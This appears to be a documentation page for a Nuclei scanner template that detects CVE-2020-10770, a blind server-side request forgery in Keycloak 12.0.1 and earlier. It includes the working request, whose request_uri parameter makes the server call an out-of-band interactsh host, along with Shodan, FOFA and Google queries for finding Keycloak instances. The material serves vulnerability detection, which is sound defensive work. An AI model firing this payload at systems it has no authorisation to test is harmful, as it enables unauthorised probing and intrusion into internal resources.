Skip to content
Nuclei Templates

Keycloak <= 12.0.1 - request_uri Blind Server-Side Request Forgery (SSRF)

ID: CVE-2020-10770

Severity: medium

Author: dhiyaneshDk

Tags: cve,cve2020,keycloak,ssrf,oast,blind,packetstorm,edb,redhat

Description

Section titled “Description”

Keycloak 12.0.1 and below allows an attacker to force the server to request an unverified URL using the OIDC parameter request_uri. This allows an attacker to execute a server-side request forgery (SSRF) attack.

YAML Source

Section titled “YAML Source”
id: CVE-2020-10770


info:
  name: Keycloak <= 12.0.1 - request_uri Blind Server-Side Request Forgery (SSRF)
  author: dhiyaneshDk
  severity: medium
  description: Keycloak 12.0.1 and below allows an attacker to force the server to request an unverified URL using the OIDC parameter request_uri. This allows an attacker to execute a server-side request forgery (SSRF) attack.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access to internal resources, data leakage, or further attacks.
  remediation: |
    Upgrade Keycloak to a version higher than 12.0.1 to mitigate this vulnerability.
  reference:
    - https://packetstormsecurity.com/files/164499/Keycloak-12.0.1-Server-Side-Request-Forgery.html
    - https://www.exploit-db.com/exploits/50405
    - https://nvd.nist.gov/vuln/detail/CVE-2020-10770
    - https://bugzilla.redhat.com/show_bug.cgi?id=1846270
    - https://github.com/soosmile/POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
    cvss-score: 5.3
    cve-id: CVE-2020-10770
    cwe-id: CWE-918
    epss-score: 0.16545
    epss-percentile: 0.96007
    cpe: cpe:2.3:a:redhat:keycloak:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: redhat
    product: keycloak
    shodan-query:
      - http.html:"keycloak"
      - http.title:"keycloak"
      - http.favicon.hash:-1105083093
    fofa-query:
      - title="keycloak"
      - icon_hash=-1105083093
      - body="keycloak"
    google-query: intitle:"keycloak"
  tags: cve,cve2020,keycloak,ssrf,oast,blind,packetstorm,edb,redhat


http:
  - method: GET
    path:
      - '{{BaseURL}}/auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://{{interactsh-url}}/'


    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
# digest: 4b0a0048304602210087de40ac54e29dc6c51fe842835e5f465fa5422531c7710fc24ef9d50fb7753f0221009720b27a543e2dc69f71b4b8928c0d5d861cf32b5cb8698340e8376e9ba4a9f7:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-10770.yaml"

View on Github